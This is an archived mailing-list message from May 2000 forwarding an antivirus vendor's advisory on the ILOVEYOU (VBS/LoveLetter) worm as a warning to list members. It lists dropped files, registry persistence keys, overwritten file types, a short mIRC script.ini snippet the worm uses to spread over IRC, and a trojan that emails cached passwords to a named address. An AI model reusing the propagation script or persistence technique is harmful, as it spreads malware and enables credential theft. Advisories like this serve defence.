Virus Name.htm

From: Paul F. Evans (evans@wilmington.net)
Date: Thu May 04 2000 - 22:18:45 EDT

Next message: Wieland Willker: "Greek NT at Perseus"
Previous message: Mark Armstrong: "RE: Rev. 14:10"
Messages sorted by: [ date ] [ thread ] [ subject ] [ author ] [ attachment ]
Mail actions: [ respond to this message ] [ mail a new topic ]

<x-html>
<!DOCTYPE HTML PUBLIC "-//W3C//DTD HTML 4.0 Transitional//EN">
<HTML xmlns:o = "urn:schemas-microsoft-com:office:office" xmlns:w =
"urn:schemas-microsoft-com:office:word"><HEAD><TITLE>Virus Name:</TITLE>
<META content="text/html; charset=windows-1252" http-equiv=Content-Type><BASE
href=http://www.drsolomon.com/home/vbslove.htm>
<META content=Word.Document name=ProgId>
<META content="Microsoft Word 9" name=Generator>
<META content="Microsoft Word 9" name=Originator><LINK
href="./vbslove_files/filelist.xml" rel=File-List>
<STYLE>@font-face {
 font-family: MS Mincho;
}
@font-face {
 font-family: \@MS Mincho;
}
P.MsoNormal {
 FONT-FAMILY: "Times New Roman"; FONT-SIZE: 10pt; MARGIN: 0cm 0cm 0pt; mso-fareast-font-family: "Times New Roman"; mso-style-parent: ""; mso-pagination: widow-orphan
}
LI.MsoNormal {
 FONT-FAMILY: "Times New Roman"; FONT-SIZE: 10pt; MARGIN: 0cm 0cm 0pt; mso-fareast-font-family: "Times New Roman"; mso-style-parent: ""; mso-pagination: widow-orphan
}
DIV.MsoNormal {
 FONT-FAMILY: "Times New Roman"; FONT-SIZE: 10pt; MARGIN: 0cm 0cm 0pt; mso-fareast-font-family: "Times New Roman"; mso-style-parent: ""; mso-pagination: widow-orphan
}
P.MsoPlainText {
 FONT-FAMILY: "Courier New"; FONT-SIZE: 10pt; MARGIN: 0cm 0cm 0pt; mso-fareast-font-family: "Times New Roman"; mso-pagination: widow-orphan
}
LI.MsoPlainText {
 FONT-FAMILY: "Courier New"; FONT-SIZE: 10pt; MARGIN: 0cm 0cm 0pt; mso-fareast-font-family: "Times New Roman"; mso-pagination: widow-orphan
}
DIV.MsoPlainText {
 FONT-FAMILY: "Courier New"; FONT-SIZE: 10pt; MARGIN: 0cm 0cm 0pt; mso-fareast-font-family: "Times New Roman"; mso-pagination: widow-orphan
}
SPAN.EmailStyle15 {
 COLOR: windowtext; mso-style-type: personal; mso-ansi-font-size: 10.0pt; mso-ascii-font-family: Arial; mso-hansi-font-family: Arial; mso-bidi-font-family: Arial
}
SPAN.EmailStyle16 {
 COLOR: windowtext; mso-style-type: personal; mso-ansi-font-size: 10.0pt; mso-ascii-font-family: Arial; mso-hansi-font-family: Arial; mso-bidi-font-family: Arial
}
DIV.Section1 {
 page: Section1
}
</STYLE>

<META content="MSHTML 5.00.2919.6307" name=GENERATOR>
<META content="MSHTML 5.00.2919.6307" name=GENERATOR></HEAD>
<BODY bgColor=#ffffff lang=EN-GB style="tab-interval: 36.0pt">
<DIV>Folks,</DIV>
<DIV> </DIV>
<DIV>Sorry for and replication or redundancy.  However, this
is serious enough for all who use the net to be aware of it.  Because the
e-mail addresses are generated from infected computers there is a false sense of
security because the sender will be someone you know.</DIV>
<DIV> </DIV>
<DIV>Paul</DIV>
<DIV> </DIV>
<DIV> </DIV>
<DIV class=Section1>
Virus
Name:     
VBS/LoveLetter.worm<o:p></o:p>
Aliases:           
none known<o:p></o:p>
<![if !supportEmptyParas]> <![endif]><o:p></o:p>
Characteristics:<o:p></o:p>
<![if !supportEmptyParas]> <![endif]><o:p></o:p>
This worm is a
VBS program that is sent attached to an email with the subject ILOVEYOU.
<o:p></o:p>
The mail
contains the message "kindly check the attached LOVELETTER coming from
me."<o:p></o:p>
<![if !supportEmptyParas]> <![endif]><o:p></o:p>
The attachment
is called LOVE-LETTER-FOR-YOU.TXT.vbs<o:p></o:p>
<![if !supportEmptyParas]> <![endif]><o:p></o:p>
If the user
runs the attachment the worm runs using the Windows Scripting Host program. This
is not normally present on<o:p></o:p>
Windows 95 or
Windows NT unless Internet Explorer 5 is installed.<o:p></o:p>
<![if !supportEmptyParas]> <![endif]><o:p></o:p>
When the worm
is first run it drops copies of itself in the following places
:-<o:p></o:p>
<![if !supportEmptyParas]> <![endif]><o:p></o:p>
C:\WINDOWS\SYSTEM\MSKERNEL32.VBS<o:p></o:p>
C:\WINDOWS\WIN32DLL.VBS<o:p></o:p>
C:\WINDOWS\SYSTEM\LOVE-LETTER-FOR-YOU.TXT.VBS<o:p></o:p>
<![if !supportEmptyParas]> <![endif]><o:p></o:p>
It also adds
the registry keys :-<o:p></o:p>
<![if !supportEmptyParas]> <![endif]><o:p></o:p>
HKEY_LOCAL_MACHINE\Software\Microsoft\Windows\CurrentVersion\Run\
MSKernel32=C:\WINDOWS\SYSTEM\MSKernel32.vbs<o:p></o:p>
HKEY_LOCAL_MACHINE\Software\Microsoft\Windows\CurrentVersion\RunServices\
Win32DLL=C:\WINDOWS\Win32DLL.vbs<o:p></o:p>
<![if !supportEmptyParas]> <![endif]><o:p></o:p>
in order to run
the worm at system start-up.<o:p></o:p>
<![if !supportEmptyParas]> <![endif]><o:p></o:p>
<![if !supportEmptyParas]> <![endif]><o:p></o:p>
The worm
replaces the following files :-<o:p></o:p>
<![if !supportEmptyParas]> <![endif]><o:p></o:p>
*.JPG<o:p></o:p>
*.JPEG<o:p></o:p>
*.MP3<o:p></o:p>
*.MP2<o:p></o:p>
<![if !supportEmptyParas]> <![endif]><o:p></o:p>
with copies of
itself and it adds the extension .VBS to the original filename. So PICT.JPG
would be replaced with PICT.JPG.VBS and this would contain the
worm.<o:p></o:p>
<![if !supportEmptyParas]> <![endif]><o:p></o:p>
The worm also
overwrites the following files :-<o:p></o:p>
<![if !supportEmptyParas]> <![endif]><o:p></o:p>
*.VBS<o:p></o:p>
*.VBE<o:p></o:p>
*.JS<o:p></o:p>
*.JSE<o:p></o:p>
*.CSS<o:p></o:p>
*.WSH<o:p></o:p>
*.SCT<o:p></o:p>
*.HTA<o:p></o:p>
<![if !supportEmptyParas]> <![endif]><o:p></o:p>
with copies of
itself and renames the files to *.VBS.<o:p></o:p>
<![if !supportEmptyParas]> <![endif]><o:p></o:p>
The worm
creates a file LOVE-LETTER-FOR-YOU.HTM which contains the worm and this is then
sent to the IRC channels if<o:p></o:p>
the mIRC client
is installed. This is accomplished by the worm replacing the file SCRIPT.INI
with the following script :-<o:p></o:p>
<![if !supportEmptyParas]> <![endif]><o:p></o:p>
[script]<o:p></o:p>
n0=on
1:JOIN:#:{<o:p></o:p>
n1=  /if ( $nick == $me ) { halt
}<o:p></o:p>
n2=  /.dcc send $nick
C:\WINDOWS\SYSTEM\LOVE-LETTER-FOR-YOU.HTM<o:p></o:p>
n3=}<o:p></o:p>
<![if !supportEmptyParas]> <![endif]><o:p></o:p>
After a short
delay the worm uses Microsoft Outlook to send copies of itself to all entries in
the address book. <o:p></o:p>
The mails will
be of the same format as the original mail.<o:p></o:p>
<![if !supportEmptyParas]> <![endif]><o:p></o:p>
<![if !supportEmptyParas]> <![endif]><o:p></o:p>
This worm also
has another trick up it's sleeve in that it tries to download and install an
executable file called WIN-BUGSFIX.EXE from the Internet. This exe file is a
password stealing program that will email any cached
passwords<o:p></o:p>
to the mail
address MAILME@SUPER.NET.PH<o:p></o:p>
<![if !supportEmptyParas]> <![endif]><o:p></o:p>
In order to
facilitate this download the worm sets the start-up page of Microsoft Internet
Explorer to point to the web-page containing the password stealing
trojan.<o:p></o:p>
<![if !supportEmptyParas]> <![endif]><o:p></o:p>
The email sent
by this program is as follows :-<o:p></o:p>
<![if !supportEmptyParas]> <![endif]><o:p></o:p>
<![if !supportEmptyParas]> <![endif]><o:p></o:p>
From:
goat1@192.168.0.2To: mailme@super.net.phSubject: Barok...
email.passwords.sender.trojanX-Mailer: Barok...
email.passwords.sender.trojan---by: spyderHost: goat1Username: Goat1IP Address:
192.168.0.2<o:p></o:p>
<![if !supportEmptyParas]> <![endif]><o:p></o:p>
RAS
Passwords:...<o:p></o:p>
<password
information goes here><o:p></o:p>
...<o:p></o:p>
Cache
Passwords:...<o:p></o:p>
<password
information goes here><o:p></o:p>
...<o:p></o:p>
<![if !supportEmptyParas]> <![endif]><o:p></o:p>
goatserver.goatnet/goatserver.goatnet
: GOATNET\goat1:<o:p></o:p>
<![if !supportEmptyParas]> <![endif]><o:p></o:p>
MAPI                          
: MAPI<o:p></o:p>
<![if !supportEmptyParas]> <![endif]><o:p></o:p>
<![if !supportEmptyParas]> <![endif]><o:p></o:p>
<![if !supportEmptyParas]> <![endif]><o:p></o:p>
The password
stealing trojan is also installed via the following registry key
:-<o:p></o:p>
<![if !supportEmptyParas]> <![endif]><o:p></o:p>
HKEY_LOCAL_MACHINE\Software\Microsoft\Windows\CurrentVersion\Run\WIN-BUGSFIX<o:p></o:p>
<![if !supportEmptyParas]> <![endif]><o:p></o:p>
to auto run at
system start-up.<o:p></o:p>
<![if !supportEmptyParas]> <![endif]><o:p></o:p>
After it has
been run the password stealing trojan copies itself to
WINDOWS\SYSTEM\WinFAT32.EXE and replaces the registry key
with<o:p></o:p>
<![if !supportEmptyParas]> <![endif]><o:p></o:p>
HKEY_LOCAL_MACHINE\Software\Microsoft\Windows\CurrentVersion\Run\WinFAT32=WinFAT32.EXE<o:p></o:p>
<![if !supportEmptyParas]> <![endif]><o:p></o:p>
<![if !supportEmptyParas]> <![endif]><o:p></o:p>
<![if !supportEmptyParas]> <![endif]><o:p></o:p>
Date
Discovered: Thursday May 4th 2000<o:p></o:p>
DAT
included:   
4077<o:p></o:p>
Risk:                
High<o:p></o:p>
<![if !supportEmptyParas]> <![endif]><o:p></o:p></DIV></BODY></HTML>

</x-html>

Next message: Wieland Willker: "Greek NT at Perseus"
Previous message: Mark Armstrong: "RE: Rev. 14:10"
Messages sorted by: [ date ] [ thread ] [ subject ] [ author ] [ attachment ]
Mail actions: [ respond to this message ] [ mail a new topic ]

This archive was generated by hypermail 2.1.4 : Sat Apr 20 2002 - 15:36:24 EDT